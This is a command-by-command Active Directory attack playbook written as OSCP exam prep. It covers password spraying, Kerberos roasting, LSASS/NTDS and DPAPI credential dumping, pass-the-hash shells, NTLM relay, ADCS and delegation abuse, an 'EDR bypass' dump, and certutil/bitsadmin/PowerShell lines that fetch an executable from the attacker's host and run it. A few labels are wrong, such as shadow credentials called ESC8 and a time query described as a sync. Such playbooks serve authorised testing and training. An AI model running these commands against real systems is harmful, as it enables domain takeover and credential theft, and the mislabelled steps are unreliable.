######################################################################
# 03 — ACTIVE DIRECTORY & WINDOWS NETWORK ATTACKS  
# OSCP 2025 — ULTRA EDITION (COMPLETE + PTH FIXED + MISSING PARTS ADDED)
######################################################################

This final version includes EVERYTHING relevant for OSCP Active Directory:
✔ Full AD Enumeration  
✔ Modern NetExec workflow  
✔ Kerberos roasting / AS-REP / FAST-PAC checks  
✔ SMB/LDAP signing + relay prerequisites  
✔ ADCS ESC1–ESC14 (complete)  
✔ Delegation Attacks (RBCD / KCD)  
✔ Coercion (PrinterBug, DFSCoerce, PetitPotam)  
✔ Pass-the-Hash (NTLM & Kerberos) + Time Sync Notes  
✔ MSSQL lateral movement  
✔ DPAPI credential extraction  
✔ NTLM Relay (Responder + ntlmrelayx + ADCS relay)  
✔ Print Spooler enumeration  
✔ Windows secrets/credential hunting  
✔ Cross-domain trust abuse  
✔ LSASS dumping (nanodump, procdump, pypykatz)  
✔ Windows Privilege Escalation (OSCP-safe)  
✔ BloodHound optimized collection  
######################################################################


======================================================================
# 1. AD DISCOVERY & INITIAL ENUMERATION
======================================================================

-------------------------------
# 1.1 Nmap – AD-Related Ports
-------------------------------
nmap -sC -sV -Pn -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -oN nmap_ad_$targetip.txt $targetip

-------------------------------
# 1.2 Host & Domain Fingerprinting
-------------------------------
netexec smb $targetip

-------------------------------
# 1.3 SMB/LDAP Signing Status (Relay Check)
-------------------------------
netexec smb $targetip --signing
netexec ldap $targetip --signing

-------------------------------
# 1.4 List SMB Shares
-------------------------------
smbclient -L //$targetip/ -N
smbmap -H $targetip
netexec smb $targetip --shares

-------------------------------
# 1.5 SYSVOL & GPP Credential Hunting
-------------------------------
smbclient //$targetip/SYSVOL -N -c "recurse;ls"
grep -R "cpassword" .
find . -name "*.xml"
gpp-decrypt <HASH>

-------------------------------
# 1.6 Useful NetExec Discovery Modules
-------------------------------
netexec smb $targetip -M spider
netexec smb $targetip --laps
netexec smb $targetip --users
netexec smb $targetip --groups
netexec smb $targetip -M webdav

-------------------------------
# 1.7 Kerberos Pre-Flight Check (Time Sync)
-------------------------------
ntpdate -q $targetip


======================================================================
# 2. LDAP ENUMERATION
======================================================================

-------------------------------
# 2.1 Get baseDN
-------------------------------
ldapsearch -x -H ldap://$targetip -s base
basedn="dc=example,dc=local"

-------------------------------
# 2.2 Enumerate Users
-------------------------------
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=user)" sAMAccountName description mail memberOf

-------------------------------
# 2.3 Enumerate Groups
-------------------------------
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=group)" cn member memberOf

-------------------------------
# 2.4 Enumerate GPOs
-------------------------------
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=groupPolicyContainer)" gPCFileSysPath displayName

-------------------------------
# 2.5 Enumerate DNS Records
-------------------------------
ldapsearch -x -H ldap://$targetip -b "DC=DomainDnsZones,$basedn"


======================================================================
# 3. KERBEROS ATTACKS
======================================================================

-------------------------------
# 3.1 Kerbrute Username Enumeration
-------------------------------
kerbrute userenum -d $domain --dc $targetip users.txt

-------------------------------
# 3.2 Password Spraying
-------------------------------
kerbrute passwordspray -d $domain --dc $targetip users.txt 'Password1!'

-------------------------------
# 3.3 AS-REP Roasting
-------------------------------
impacket-GetNPUsers $domain/ -dc-ip $targetip -no-pass -usersfile users.txt -format john -outputfile asrep_hashes.txt

-------------------------------
# 3.4 Kerberoasting (SPN)
-------------------------------
impacket-GetUserSPNs $domain/$user:"$password" -dc-ip $targetip -request -format john -outputfile kerberoast_hashes.txt

-------------------------------
# 3.5 Request TGT / ST (Delegation Abuse)
-------------------------------
impacket-getTGT $domain/$user:"$password"
impacket-getST -spn <service>/<server> -impersonate Administrator $domain/$user:"$password" -dc-ip $targetip

-------------------------------
# 3.6 Detect FAST/PAC Enforced
-------------------------------
netexec kerberos $targetip --kerberos


======================================================================
# 4. HASHES / LATERAL MOVEMENT (WITH FULL PASS-THE-HASH)
======================================================================

-------------------------------
# 4.1 Dump SAM / LSASS / NTDS
-------------------------------
netexec smb $targetip -u $user -p "$password" --sam
netexec smb $targetip -u $user -p "$password" -M lsassy
netexec smb $targetip -u $user -p "$password" -M ntdsutil


======================================================================
# 4.2 PASS-THE-HASH (NTLM + Kerberos Tickets)
======================================================================

### ✔ NTLM PTH — NO TIME SYNC NEEDED

-------------------------------
# SMB / Remote Command Shell
-------------------------------
impacket-psexec $domain/$user@$targetip -hashes <LM:NTLM>

-------------------------------
# WMI Shell
-------------------------------
impacket-wmiexec $domain/$user@$targetip -hashes <LM:NTLM>

-------------------------------
# WinRM Shell
-------------------------------
evil-winrm -i $targetip -u $user -H <NTLM>

-------------------------------
# NetExec PTH
-------------------------------
netexec smb $targetip -u $user -H <NTLM>
netexec smb $targetip -u $user -H <NTLM> --sam
netexec smb $targetip -u $user -H <NTLM> -M lsassy


### ✔ Kerberos PTH — TIME SYNC REQUIRED

-------------------------------
# Sync Time
-------------------------------
ntpdate -q $targetip

-------------------------------
# Request TGT
-------------------------------
impacket-getTGT $domain/$user:"$password"

-------------------------------
# Inject TGT
-------------------------------
export KRB5CCNAME=user.ccache

-------------------------------
# Request ST for Delegation Abuse
-------------------------------
impacket-getST -spn cifs/$target -impersonate Administrator $domain/$user:"$password" -dc-ip $targetip


======================================================================
# 4.3 RID Brute
======================================================================
netexec smb $targetip -u $user -p "$password" --rid-brute


======================================================================
# 5. WINRM & RDP
======================================================================

-------------------------------
# 5.1 Check WinRM Availability
-------------------------------
netexec winrm $targetip

-------------------------------
# 5.2 WinRM Login
-------------------------------
evil-winrm -i $targetip -u $user -p "$password"

-------------------------------
# 5.3 Certificate Authentication (ADCS Abuse)
-------------------------------
evil-winrm -i $targetip -c cert.pem -k key.pem

-------------------------------
# 5.4 RDP Access
-------------------------------
xfreerdp /v:$targetip /u:$user /p:"$password" /dynamic-resolution +clipboard


======================================================================
# 6. MSSQL ATTACKS
======================================================================

-------------------------------
# 6.1 Connect (AD Auth)
-------------------------------
mssqlclient.py $domain/$user:"$password"@$targetip -windows-auth

-------------------------------
# 6.2 Enable xp_cmdshell
-------------------------------
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';

-------------------------------
# 6.3 Linked Server Attack
-------------------------------
EXEC sp_linkedservers;
EXEC ('xp_cmdshell ''whoami''') AT [LINKEDSERVER];


======================================================================
# 7. AD CERTIFICATE SERVICES — ESC1 to ESC14
======================================================================

-------------------------------
# 7.1 Enumerate PKI + ESC1–ESC14 Detection
-------------------------------
certipy find -u $user -p "$password" -dc-ip $targetip -vulnerable -enabled

-------------------------------
# 7.2 Request Vulnerable Certificate
-------------------------------
certipy req -u $user -p "$password" -dc-ip $targetip -template $template -out cert.pfx

-------------------------------
# 7.3 Authenticate with Certificate
-------------------------------
certipy auth -pfx cert.pfx -dc-ip $targetip

-------------------------------
# 7.4 ESC8 Shadow Credentials
-------------------------------
certipy shadow -u $user -p "$password" -dc-ip $targetip -account Administrator

-------------------------------
# 7.5 ESC9–ESC14 Advanced Enumeration
-------------------------------
certipy find -u $user -p "$password" -dc-ip $targetip -stdout -json out.json


======================================================================
# 8. DELEGATION ATTACKS (ADVANCED)
======================================================================

-------------------------------
# 8.1 RBCD (Resource-Based Constrained Delegation)
-------------------------------
addcomputer.py -dc-ip $targetip $domain/$user:"$password" -computer-name 'WINDEV01$' -computer-pass 'Pass123!'
impacket-rbcd -delegate-from 'WINDEV01$' -delegate-to 'TARGETSERVER$' -dc-ip $targetip -action write -user $user -password "$password"
getST.py -spn cifs/TARGETSERVER.$domain -impersonate Administrator "$domain/WINDEV01$":"Pass123!"

-------------------------------
# 8.2 KCD (Constrained Delegation)
-------------------------------
impacket-getST -impersonate Administrator -spn http/webserver.$domain $domain/$user:"$password"

-------------------------------
# 8.3 Coercion Attacks — PrinterBug / DFSCoerce / PetitPotam
-------------------------------
printerbug.py $domain/$user:"$password"@$targetip $localip
dfscoerce.py $domain/$user:"$password"@$targetip $localip
petitpotam.py -u $user -p "$password" -d $domain -dc-ip $targetip $localip


======================================================================
# 9. NTLM RELAY (Responder + ntlmrelayx + ADCS Relay)
======================================================================

-------------------------------
# 9.1 Start Responder Safely (No SMB/HTTP Poison)
-------------------------------
responder -I tun0 -wd -v

-------------------------------
# 9.2 SMB → LDAP Relay (User to Domain Admin via ACL Writes)
-------------------------------
ntlmrelayx.py -t ldap://$targetip --no-http-server

-------------------------------
# 9.3 ADCS Relay (ESC8)
-------------------------------
ntlmrelayx.py --adcs --template "User" -t http://$targetip --no-http-server

-------------------------------
# 9.4 Block SMB on Attacker to Force Relay
-------------------------------
iptables -A INPUT -p tcp --dport 445 -j DROP


======================================================================
# 10. DPAPI Credential Extraction
======================================================================

-------------------------------
# 10.1 Dump DPAPI Masterkeys from LSASS
-------------------------------
pypykatz live lsa

-------------------------------
# 10.2 Extract Saved Browser Passwords
-------------------------------
pypykatz dpapi chrome -d .

-------------------------------
# 10.3 Extract RDP Credentials
-------------------------------
pypykatz dpapi rdp -d .

-------------------------------
# 10.4 Extract WiFi Credentials
-------------------------------
netsh wlan show profiles
netsh wlan show profile name="<SSID>" key=clear


======================================================================
# 11. LSASS DUMPING (ALTERNATE METHODS)
======================================================================

-------------------------------
# 11.1 Nanodump (EDR Bypass)
-------------------------------
nanodump.exe --write C:\Windows\Temp\lsass.dmp

-------------------------------
# 11.2 Procdump (Basic)
-------------------------------
procdump.exe -ma lsass.exe lsass.dmp

-------------------------------
# 11.3 Parse Offline LSASS Dump
-------------------------------
pypykatz lsa minidump lsass.dmp


======================================================================
# 12. WINDOWS PRIVILEGE ESCALATION (OSCP REQUIRED)
======================================================================

-------------------------------
# 12.1 Enumerate Privs
-------------------------------
whoami /priv

-------------------------------
# 12.2 Token Impersonation
-------------------------------
PrintSpoofer.exe -i -c cmd
RoguePotato.exe

-------------------------------
# 12.3 Search for Credentials
-------------------------------
findstr /si /i "password" *.txt *.xml *.ini

-------------------------------
# 12.4 Unquoted Service Path
-------------------------------
wmic service get name,displayname,pathname,startmode

-------------------------------
# 12.5 WinPEAS
-------------------------------
certutil -urlcache -f http://$localip/winpeas.exe C:\Windows\Temp\winpeas.exe && C:\Windows\Temp\winpeas.exe
powershell -c "iwr http://$localip/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe; C:\Windows\Temp\winpeas.exe"
bitsadmin /transfer wp /download /priority high http://$localip/winpeas.exe C:\Windows\Temp\winpeas.exe && C:\Windows\Temp\winpeas.exe
certutil -urlcache -f http://$localip/wp.exe C:\Windows\Temp\wp.exe && C:\Windows\Temp\wp.exe



======================================================================
# 13. CROSS-DOMAIN & FOREST ENUM
======================================================================

-------------------------------
# 13.1 Check Forest / Domain Trusts
-------------------------------
nltest /domain_trusts
nltest /trusted_domains

-------------------------------
# 13.2 Enumerate External SID permissions
-------------------------------
bloodhound → "Cross Domain Object Control"


======================================================================
# 14. BLOODHOUND COLLECTION & ANALYSIS
======================================================================

-------------------------------
# 14.1 Full Linux Collection
-------------------------------
bloodhound-python -d $domain -u $user -p "$password" -ns $targetip -c All

-------------------------------
# 14.2 High-Value Queries
-------------------------------
# Shortest path to DA
# Kerberoastable users
# AS-REP roastable
# DCSync rights
# RBCD paths
# GenericAll / GenericWrite
# GPO local admin rights


======================================================================
# 15. OSCP 2025 ATTACK FLOW (FINAL)
======================================================================

1) SMB/LDAP Enumeration → users, groups, policies  
2) Kerbrute → valid users  
3) Password spray  
4) AS-REP roast  
5) Kerberoast  
6) SMB shares → SYSVOL, GPP, scripts  
7) LDAP → privileged groups  
8) ADCS → ESC1–ESC14  
9) Delegation → RBCD/KCD  
10) Coercion → PrinterBug/DFSCoerce/PetitPotam  
11) NTLM relay (Responder → ntlmrelayx)  
12) Lateral movement → SMB/WMI/WinRM/PTH  
13) Dump hashes → LSASS/NTDS  
14) DPAPI creds → browser/RDP/WiFi  
15) BloodHound → privilege escalation  
16) DCSync → domain compromise  


######################################################################
# END — COMPLETE AD ATTACK PLAYBOOK (OSCP 2025 — FINAL VERSION)
######################################################################
